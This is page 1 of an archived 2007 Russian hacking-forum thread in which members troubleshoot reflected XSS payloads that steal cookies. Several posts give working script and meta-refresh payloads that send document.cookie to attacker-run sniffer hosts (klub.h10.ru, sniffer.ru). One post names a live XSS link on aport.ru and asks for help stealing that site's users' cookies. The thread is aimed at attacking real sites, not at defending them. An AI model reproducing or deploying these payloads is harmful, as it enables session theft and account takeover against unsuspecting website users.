HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу xSs как отправить кукисы на
   
Ответ
Страница 1 из 2 1 2 >
 
Опции темы Поиск в этой теме Опции просмотра

xSs как отправить кукисы на
  #1  
Старый 16.02.2007, 21:13
Chakir
Познающий
Регистрация: 17.04.2006
Сообщений: 47
Провел на форуме:
605976

Репутация: 14
По умолчанию xSs как отправить кукисы на
пробую так!
Код:
ssss"><script>alert('xss')</script>
всё ок выкибывает исправно!
пробую так
Код:
ssss"><script>alert(document.cookie)</script>
всё ок кидает куки!
пробуё так
Код:
ssss"><script>img = new Image(); img.src = "http://www.klub.h10.ru/snif/s.php?"+document.cookie;</script>
не канает!

как отправить кукисы на http://www.klub.h10.ru/snif/s.php
 
Ответить с цитированием

  #2  
Старый 16.02.2007, 21:26
Robin_Hood
Участник форума
Регистрация: 30.10.2006
Сообщений: 238
Провел на форуме:
966901

Репутация: 444
Отправить сообщение для Robin_Hood с помощью ICQ
По умолчанию
скорее всего стоит ограничение на длину строки
 
Ответить с цитированием

  #3  
Старый 16.02.2007, 21:37
Abra
Постоянный
Регистрация: 17.09.2005
Сообщений: 375
Провел на форуме:
993362

Репутация: 175
По умолчанию
Исходный код смотри - что в нем получается.
 
Ответить с цитированием

  #4  
Старый 16.02.2007, 22:03
Dagon
Познающий
Регистрация: 27.03.2006
Сообщений: 86
Провел на форуме:
972602

Репутация: 52
По умолчанию
попробуй так "><script src=http://site.com/js.js></script>

в js.js - img=new Image();img.src="http://sniffer.ru/s.gif?"+document.cookie;
 
Ответить с цитированием

  #5  
Старый 16.02.2007, 23:24
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию
дай линк на сайт.
очень часто нужно писать +escape(document.cookie);
 
Ответить с цитированием

  #6  
Старый 17.02.2007, 00:39
ya_mag
Познающий
Регистрация: 18.01.2007
Сообщений: 63
Провел на форуме:
292941

Репутация: 27
По умолчанию
может и мне кто поможет? нашол вот такой xss
<meta http-equiv=Refresh content=0;url=javascript:alert("OK")>
пишеш
<meta http-equiv=Refresh content=0;url=javascript:document.cookie> показывает куки...
делаю ссылку на фаил js.js на снифер ничего не приходит
ссылку делаю вот так
<meta http-equiv=Refresh content=0;url=javascript:http://my_site/js.js>
и вот так вот пробывал
<meta http-equiv=Refresh content=0;url=javascript:new Image();img.src="http://my_site/s.gif?"+document.cookie;>
может я неправильно ссылку ставлю?
Последний раз редактировалось ya_mag; 17.02.2007 в 01:21..
 
Ответить с цитированием

  #7  
Старый 17.02.2007, 00:44
GreenBear
наркоман с медалью
Регистрация: 07.05.2005
Сообщений: 3,704
Провел на форуме:
19975136

Репутация: 4536


Отправить сообщение для GreenBear с помощью ICQ
По умолчанию
без javascript в url
и на хтмл страницу со скриптом
Последний раз редактировалось Green_Bear; 17.02.2007 в 01:29..
 
Ответить с цитированием

  #8  
Старый 17.02.2007, 01:25
ya_mag
Познающий
Регистрация: 18.01.2007
Сообщений: 63
Провел на форуме:
292941

Репутация: 27
По умолчанию
Цитата:
Сообщение от Green_Bear  
без javascript в url
без javascript просто открыват внутренность того чтонаписанно в js.js
 
Ответить с цитированием

  #9  
Старый 17.02.2007, 15:11
Chakir
Познающий
Регистрация: 17.04.2006
Сообщений: 47
Провел на форуме:
605976

Репутация: 14
По умолчанию
народ вот xss на апорт.ру а как сделать чтобы она кукисы на http://www.klub.h10.ru/snif/s.php отсылала? логи смотреть тут http://www.klub.h10.ru/snif/log.php
помогите кто поможет таму +
кому помог я тот мне + =)
Код:
http://sm.aport.ru/scripts/template.dll?That=std&r=%22%3E%3Cscript%3Ealert%28%27XSS_by_Chakir%27%29%3C%2Fscript%3E
 
Ответить с цитированием

  #10  
Старый 24.02.2007, 09:00
VampiRUS
Участник форума
Регистрация: 31.12.2005
Сообщений: 231
Провел на форуме:
1106266

Репутация: 366
Отправить сообщение для VampiRUS с помощью Yahoo
По умолчанию
подскажте как провести xss, если все что идёт после "/" режется?
 
Ответить с цитированием
Ответ
Страница 1 из 2 1 2 >



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Как стать хакером! foreva Болталка 19 12.12.2007 00:12
Мой ржачный разговор в аське с кем-то вроде как с античата, как я подумал Дрэгги Болталка 21 22.07.2007 12:33



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ